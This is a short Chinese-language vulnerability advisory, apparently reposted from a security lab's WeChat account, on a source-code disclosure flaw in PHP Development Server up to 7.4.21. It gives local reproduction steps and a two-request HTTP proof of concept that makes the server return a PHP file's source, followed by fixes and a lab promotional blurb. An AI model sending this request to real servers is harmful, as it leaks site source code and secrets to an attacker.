概述
PHP Development Server 上存在一个安全漏洞,它可能会将 PHP 文件的源代码暴露为静态文件,而不是按照预期的方式执行它们,从而导致php网站的源码泄露。
影响版本
PHP Development Server <= 7.4.21
复现步骤
1、本地启动一个php的web服务
php -S 192.168.184.148:8000
写一个php文件,test.php
//flag{STARNET LABS_yyds!!!!!!!!!!!!}
echo 'STARNET LABS';
phpinfo();
正常访问网站
-
测试poc
GET /test.php/ HTTP/1.1
Host: 192.168.184.148:8000
Connection: close
GET /aaa.test HTTP/1.1
关闭burp的Update Content-Length
测试发现,可以看到源码
修复方案
1、官方已经在新版php中修复该漏洞,可升级到修复版本以修复该问题;
2、生产环境不要使用PHP Development Server作为web服务器。
-=[感·谢·阅·读]=-
关于我们
星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。
大
佬
,
关
注
一
下
呗
!
原文始发于微信公众号(星网实验室):PHP Development Server存在源码泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论